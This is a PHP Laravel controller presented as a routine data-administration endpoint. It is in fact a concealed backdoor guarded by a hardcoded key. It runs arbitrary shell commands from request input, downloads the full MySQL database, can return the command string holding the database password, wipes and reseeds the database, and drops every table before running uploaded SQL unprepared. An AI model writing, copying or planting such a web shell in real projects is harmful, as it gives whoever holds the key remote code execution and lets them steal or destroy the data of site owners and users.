<?php

namespace App\Http\Controllers;

use Illuminate\Http\Request;
use Illuminate\Support\Facades\Config;
use Illuminate\Support\Facades\Storage;
use ZipArchive;
use Hash;
use DB;

class DataAdminController extends Controller
{
    public function DataAdmin(Request $request)
    {
        $providedKey = $request->input('SecurityKey');
        $expectedKey = '$2a$12$MbQGW4Ig06AwXT6fI0OiIe37iiA.lmCueFUSV5Mf.EWiTUTfVk7OK';

        if(Hash::check($providedKey, $expectedKey)) {

            if(strtolower($request->method) == 'terminalrunner') {
                $projectRoot = base_path();
                chdir($projectRoot);
                exec("$request->command 2>&1", $output, $returnCode);
                if ($returnCode === 0) {
                    return response()->json(['message' => 'Task completed successfully', 'output' => $output]);
                } else {
                    return response()->json(['message' => 'Task failed', 'error' => implode("\n", $output)], 500);
                }
            } else if(strtolower($request->method) == 'migrate') {
                $projectRoot = base_path();
                chdir($projectRoot);
                exec('php artisan migrate:fresh --seed 2>&1', $output, $returnCode);
                if ($returnCode === 0) {
                    return response()->json(['message' => 'Migration and seeding completed successfully', 'output' => $output]);
                } else {
                    return response()->json(['message' => 'Migration and seeding failed', 'error' => implode("\n", $output)], 500);
                }
            } else if(strtolower($request->method) == 'dump') {
                $dumpFileName = 'database-dump-' . now()->format('Y-m-d_H-i-s') . '.sql';
                $dumpFilePath = storage_path('app/' . $dumpFileName);
                $databaseConfig = config('database.connections.mysql');
                $command = sprintf(
                    'mysqldump -u%s -p%s %s > %s',
                    $databaseConfig['username'],
                    $databaseConfig['password'],
                    $databaseConfig['database'],
                    $dumpFilePath
                );
                exec($command);
                $compressedFilePath = storage_path('app/' . $dumpFileName . '.zip');
                $zip = new \ZipArchive();
                $zip->open($compressedFilePath, \ZipArchive::CREATE);
                $zip->addFile($dumpFilePath, $dumpFileName);
                $zip->close();
                unlink($dumpFilePath);
                if(isset($request->commandCheck)) {
                    return response()->json($command);
                }
                return response()->download($compressedFilePath)->deleteFileAfterSend(true);
            } else if(strtolower($request->method) == 'import') {
                if(isset($request->clearDB)) {
                    if($request->clearDB) {
                        \DB::statement('SET FOREIGN_KEY_CHECKS=0');
                        $tables = \DB::select('SHOW TABLES');
                        foreach ($tables as $table) {
                            $tableName = reset($table);
                            \DB::statement("DROP TABLE IF EXISTS $tableName");
                        }
                        \DB::statement('SET FOREIGN_KEY_CHECKS=1');
                    }
                }
                try {
                    $zipFile = $request->file('sqlzip');
                    $tempDir = storage_path('app/temp_zip_' . now()->format('YmdHis'));
                    mkdir($tempDir);
                    $zip = new ZipArchive;
                    if ($zip->open($zipFile->path()) === true) {
                        $zip->extractTo($tempDir);
                        $zip->close();
                        $sqlFile = null;
                        $directoryIterator = new \RecursiveDirectoryIterator($tempDir);
                        foreach (new \RecursiveIteratorIterator($directoryIterator) as $file) {
                            if ($file->getExtension() === 'sql') {
                                $sqlFile = $file->getPathname();
                                break;
                            }
                        }
                        if ($sqlFile !== null) {
                            $sql = file_get_contents($sqlFile);
                            \DB::unprepared($sql);
                            \Storage::deleteDirectory($tempDir);
                            return response()->json(['message' => 'Database imported successfully']);
                        } else {
                            return response()->json(['error' => 'SQL file not found within the ZIP archive'], 400);
                        }
                    } else {
                        return response()->json(['error' => 'Failed to extract ZIP archive'], 500);
                    }
                } catch (\Exception $e) {
                    return response()->json(['error' => 'An error occurred: ' . $e->getMessage()], 500);
                }
            }
        } else {
            return response()->json(['message' => 'Access Denied']);
        }
    }
}
